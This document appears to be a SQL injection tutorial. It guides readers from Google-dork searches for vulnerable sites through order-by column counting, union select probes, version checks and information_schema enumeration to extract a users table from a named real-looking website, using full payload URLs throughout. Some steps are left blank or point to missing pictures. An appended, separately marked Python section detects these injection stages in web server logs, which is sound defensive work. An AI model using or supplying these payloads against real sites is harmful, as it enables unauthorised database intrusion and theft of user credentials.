SQL Injection Complete Tutorial [Website Hacking]

Okay, first find a vulnerable website.
To get vulnerable websites,
open google.com
and type one of these dorks:


Well, there is a huge list of Google dorks;
you can get these from Google.

When you type one of the Google dorks, thousands of sites
will be returned.
Now open a website and type ' at the end of the URL.
If you get this error

then the website is vulnerable and you can try to hack it

okay now that you have this error

now you need to find the number of columns

now remove ' and type

order by 1 (syntax)
now your URL will be like
www.brew-monkey.com/news.php?id=465 order by 1

if you don't get any error then increase the number
www.brew-monkey.com/news.php?id=465 order by 2 (no error)
www.brew-monkey.com/news.php?id=465 order by 3 (no error)
www.brew-monkey.com/news.php?id=465 order by 4 (no error)
www.brew-monkey.com/news.php?id=465 order by 5 (no error)

www.brew-monkey.com/news.php?id=465 order by 6
oh, an error came here

Unknown column '6' in 'order clause'

so the number of columns in this website is 5

now it's time to use the union all select statement

okay, as we know, our website has 5 columns
now we need to find the vulnerable columns

for that use this syntax

www.brew-monkey.com/news.php?id=465 union all select 1,2,3,4,5--

now see the pic 3

here you can clearly see some bold numbers

in this website the number is 3

that means the string column is 3


now let's check the MySQL version of the website

to check this you need to replace your URL with

?id=465 union all select 1,2,@@version,4,5--

okay, now see the pic 4

you can clearly see in this pic that

where the column number was written there is now a different value, and that is the
database version

okay, if the number is greater than or equal to 5 then it's good
because it's easy to crack
if it's below, then the SQL injection is blind
(it does not mean that you can't crack the db, but we have to guess
the table names and all)
so now, as we have checked this,
we are going to crack its db
let's find the tables of this database
okay, now replace the URL with

www.brew-monkey.com/news.php?id=465 union all select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()

if it does not work then use

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

wow, see the pic 5 below

we have all its tables now

now we have to check its tables and find some table with sensitive information

it may be admin, users, usergroups etc.

okay, so here I'm trying to crack this table


okay, so now we need to replace our URL with

www.brew-monkey.com/news.php?id=465 union all select 1,2,column_name,4,5 from information_schema.columns where table_name=cpg131_users

install HackBar (a Firefox add-on) as I have
now click on sql > mysql > Mysqlchar
and type the table name
then you will get its value

now the decimal value of cpg131_users is (99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

okay, copy it and replace the URL with

www.brew-monkey.com/news.php?id=465 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=char(99, 112, 103, 49, 51, 49, 95, 117, 115, 101, 114, 115)

well, it's working

see pic 6

now we need to fetch the data of the columns

now in this website
the information is in columns


okay, to fetch these

replace the URL with



we have done it guys..

there are 3 users in this database
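
Added example, not part of the original tutorial: each step above (the ' test, order by N, union all select, @@version, information_schema) leaves a recognisable request in the web server's access log, so the whole sequence can be spotted per client. This Python sketch classifies log lines by the stage they match; the Common Log Format layout, the stage names, the IP addresses and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Stages of the walkthrough above, most specific first; stage names are this example's own.
STAGES = [
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("version_probe", re.compile(r"union\s+(all\s+)?select\b.*@@version", re.I)),
    ("union_probe", re.compile(r"union\s+(all\s+)?select\b", re.I)),
    ("column_count", re.compile(r"order\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"=[^&]*'\s*$")),
]
# Assumed log layout: Common Log Format (ip ident user [time] "request" status size).
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (client_ip, stage) for one log line, or None if no stage matches."""
    m = REQUEST.match(line)
    if not m or "?" not in m.group(2):
        return None
    # Decode %20, %27 and '+' so the patterns see the query as the database would.
    query = unquote_plus(m.group(2).split("?", 1)[1])
    for stage, pattern in STAGES:
        if pattern.search(query):
            return m.group(1), stage
    return None

def summarize(lines):
    """Map each client IP to the distinct stages it triggered, in first-seen order."""
    seen = {}
    for line in lines:
        hit = classify(line)
        if hit and hit[1] not in seen.setdefault(hit[0], []):
            seen[hit[0]].append(hit[1])
    return seen

def _line(ip, path):  # build one constructed log line
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {path} HTTP/1.1" 200 512'
# Constructed sample traffic (documentation IP ranges); not taken from any real server.
SAMPLE_LOG = [
    _line("203.0.113.9", "/news.php?id=465"),
    _line("198.51.100.7", "/news.php?id=465%27"),
    _line("198.51.100.7", "/news.php?id=465%20order%20by%206"),
    _line("198.51.100.7", "/news.php?id=465+union+all+select+1,2,3,4,5--"),
    _line("198.51.100.7", "/news.php?id=465+UNION+ALL+SELECT+1,2,@@version,4,5--"),
    _line("198.51.100.7", "/news.php?id=465+union+all+select+1,2,table_name,4,5"
                          "+from+information_schema.tables+where+table_schema=database()"),
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

A client that walks through several of these stages in order is a far stronger signal than any single match. Log matching only sees what reaches the URL and is a triage aid; the flaw itself is closed by using parameterized queries for the id parameter.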


